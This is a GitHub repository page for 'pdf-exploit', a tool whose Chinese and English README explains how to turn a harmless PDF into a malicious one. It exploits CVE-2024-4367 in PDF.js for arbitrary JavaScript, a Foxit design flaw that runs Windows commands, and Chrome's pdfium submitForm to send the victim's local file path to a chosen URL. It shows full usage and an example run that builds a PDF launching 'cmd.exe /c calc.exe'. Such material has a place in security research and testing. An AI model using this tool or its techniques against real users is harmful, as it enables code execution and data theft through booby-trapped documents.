Skip to content

rzte/pdf-exploit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

README

集成近期的一些 pdf 解析器的漏洞,制作 PDF 文档。

usage:

usage: pdf-exploit [-h] -f F [-p P] -o O [-pdfjs PDFJS] [-foxit-exec FOXIT_EXEC] [-foxit-args FOXIT_ARGS] [-submitForm SUBMITFORM]

options:
  -h, --help            show this help message and exit
  -f F                  the harmless pdf path
  -p P                  password
  -o O                  the new pdf file

pdfjs:
  CVE-2024-4367

  -pdfjs PDFJS          javascript to be executed, example: alert(3)

foxit:
  foxit pdf 'flawed design' explotation

  -foxit-exec FOXIT_EXEC
  -foxit-args FOXIT_ARGS

chrome:
  use submitForm of pdfium to steal pdf file path and other information

  -submitForm SUBMITFORM
                        The url to which the pdf path will be reported

example:

➜  pdf-exploit ./pdf.py -f ~/Downloads/data.pdf -o /tmp/data.pdf -pdfjs 'alert(3)' -foxit-exec cmd.exe -foxit-args "/c calc.exe"
[+] use the PDF.JS exploit: alert(3)
[+] make a text pdf
[+] make evil font
[+] fd ref: 9
[+] add font object to pdf: 10
[+] set font: /F1

[+] use the foxit exploit: cmd.exe /c calc.exe
set OpenAction to Catalog done

[+] store to /tmp/data.pdf

pdf-exploit

目前支持:

  • CVE-2024-4367: PDF.js 解析 pdf 时存在缺陷,可以执行任意的 javascript 脚本。
  • Foxit PDF 机制缺陷,windows平台下可以执行远程命令(有弹窗提醒)。
  • Chrome: 借助 submitForm 来窃取对应 pdf 文件在本地的路径信息(需要点击 pdf 文件任意位置,但用户无感)